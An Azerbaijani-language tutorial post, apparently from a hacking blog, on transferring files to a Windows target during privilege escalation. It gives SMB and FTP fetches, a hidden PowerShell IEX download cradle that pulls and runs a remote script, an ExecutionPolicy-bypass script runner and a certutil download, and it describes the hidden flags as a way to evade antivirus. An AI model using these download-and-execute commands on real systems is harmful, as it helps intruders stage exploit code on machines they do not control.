Windows-da Privilege Escalation zamanı Faylların Ötürülməsi hansı qaydada və necə yerinə yetilir?Faylların Ötürülməsi üçün Windows ƏS-də hansı mümkün kommandalar və üsullar mövcuddur? Məhz bu üsullar Privilege Escalation zamanı Windows-a skript yükləmək üçün istifadə olunacaqdır.
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Faylların Ötürülməsi
Linux və Windows əməliyyat sistemi üçün əməliyyatlar yerinə yetirən zaman bizim bu hədəf ƏS-lərinə faylları ötürmək lazım olacaqdır.Əsas da avtomatlaşdırılmış PrivEsc toolları,nüvənin exploit skriptlərində biz faylların ötürülməsindən istifadə edəcəyik.Digər paylaşımlarda Linux ƏS üzərində faylların ötürülməsi ilə tanış olduq bu paylaşımda isə Windows və Linux ƏS üçün daha ətraflı fayl ötürülməsi kommandalarını əhatə edəcəkdir.
Windowsa Faylları Ötürmək
Hədəf host olaraq Windows ƏS olarsa faylların mübadiləsini həyata keçirmək üçün aşağıdakı üsullardan istifadə edə bilərik.
- Samba ümumi qovluğundan istifadə edin və məhdud səlahiyyətli kommanda sətrindən samba ilə faylı əldə etməyə çalışın.
copy \\(ip)\(smb qovlugu)\(fayl adı)
copy \\192.168.1.20\Files\username.txt
- FTP-client-dən istifadə edərək Windows məhdud səlahiyyətli kommanda sətrində əldə etməyə çalışın.
ftp open (ftp serverin ip adresi)
ftp open 192.168.1.33
Daha sonra istifadəçi məlumatlarını verərək daxil olun.
ftp>binary
ftp>get (faylın adı)
ftp>get script.sh
- Ən çox yayılmış üsullardan biridə faylın PowerShell ilə yüklənərək icra edilməsidir.Bu əməliyyatı yerinə yetirmək üçün bizim ötürmək istədiyimiz fayl və ya exploit faylı mütləq olaraq bizim veb serverimizə yerləşdirilməlidir.Məhz bundan sonra aşağıdakı PowerShell əmri ilə faylı qəbul edə bilərik.
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://xaker.az/script.ps1')"
Burada olan -nop hidden parametrləri Antivirusları və Windows Defenderi mümkün qədər yaxalanmamaq və gizli şəkildə əməliyyatı icra etmək mümkündür.
- PowerShell ilə fayl ötürməyin digər bir yolu isə hədəf Windows cihazında skriptləri yazmaq və sonra isə icra etməkdir.Skript yaramaq üçün aşağıdakı kommandaları icra edilməlidir.
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://192.168.1.45/script.ps1" >> wget.ps1
echo $file = "Myscript.ps1" >> wget.ps1
echo $webclient.DownloadFile($url,file) >> wget.ps1
Və bu faylı yerinə yetirmək üçün aşağıdakı şəkildə səssiz və gizlilik təşkili üçün parametrləri tətbiq edirik.
powershell.exe -ExecutionPolicy Bypass -NoLogo -NoInteractive -NoProfile -File wget.ps1
- Bir yenə üsul mövcuddur.Certutil.exe alətindən istifadə edərək veb serverdə yerləşən faylın yüklənməsi aşağıdakı kimi yerinə yetirilir.
certutil.exe -urlcache -f -split http://192.168.10.39/script.sh
Certutil.exe alətinin işlədilməsi Antivirus və Defender tərəfindən yüksək nəzarət edilir və yüksək səlahiyyət sahibi istifadəçidən qeyri istifadə edilməsi məqsədəuyğun deyildir.
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat